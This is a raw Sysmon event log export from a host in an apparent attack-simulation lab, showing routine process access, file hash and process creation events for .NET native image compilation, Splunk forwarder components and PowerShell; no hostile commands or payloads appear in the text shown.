AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HJT7P0X2QM\Microsoft.CertificateServices.ServerManager.DeploymentPlugIn.ni.dll.auxMD5=188C5662288B7005CA735CFDE66D7BD3,SHA256=EC3DBAC210C6934862F873E8CF970E723776F0ABB649F59CBBCE952938A2C715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.949{4DB9351A-A273-60D3-4305-00000000CF01}6436NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HJT7P0X2QM\Microsoft.CertificateServices.ServerManager.DeploymentPlugIn.ni.dllMD5=E4AC7D6078A1470F5EA315AE71BEF793,SHA256=89780ADBCC831B401A41641AC11A983C14F8F0B310E5FB81C09D2B7C8D99B29A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.886{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4305-00000000CF01}6436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4305-00000000CF01}6436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4305-00000000CF01}6436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000022818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-A273-60D3-4205-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MHVM03IDWT\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll.auxMD5=CCF72535789EE65EE4064D0AD4332D29,SHA256=91217F5636A24E0A31B71CD519F5CCB76522AF7F871ABCF81B72B8C8E46D65B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=537AA3A4886E705A26510AC15083E8AC,SHA256=A1FA257CEC3E35D98FD5E475BDBD67C9C798572CA4E81559422E5C8D72D0C5DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-A273-60D3-4205-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MHVM03IDWT\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dllMD5=4249B4184A4C41F13809940331890E44,SHA256=DDBDB1A8CF709B79247DE90612F5DFC1B6072306AE7C78460563904196E60491,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.777{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4205-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4205-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4205-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.746{4DB9351A-A273-60D3-4105-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BU4WB70AQ8\Microsoft.CertificateServices.Deployment.Common.ni.dll.auxMD5=72F7EA7049EA3AC76B643C8711ADD502,SHA256=D4FCF49AB9446DC0EE6DB201B27F1C31B25E42CBF14D57B9DB01B16E0DEB35E8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.730{4DB9351A-A273-60D3-4105-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BU4WB70AQ8\Microsoft.CertificateServices.Deployment.Common.ni.dllMD5=BE219B6FBFF9A95D2AC454EC873E77C6,SHA256=3F2C836AE440F5466CFF89B2C3F0B983799F07703B3126F64A1BB1D3C073EB00,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4105-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.588{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.699{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4105-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.699{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4105-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(w
ow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.699{4DB9351A-A273-60D3-4005-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4GWQYF1U6D\Microsoft.Build.Utilities.v4.0.ni.dll.auxMD5=2FE43DA37E0EC5C880EBECB8873F8F80,SHA256=579AE18D6D8403C140405F887124DAEF5A2E4E688F9263134ECAC81D33FC03D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.698{4DB9351A-A273-60D3-4005-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4GWQYF1U6D\Microsoft.Build.Utilities.v4.0.ni.dllMD5=41B1CB5CF0943A1E95E838B88D2A9736,SHA256=9209DC06050B8B61238F83141AE98742B03DC09EDC4D600C2C2FB24C92C50D09,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C: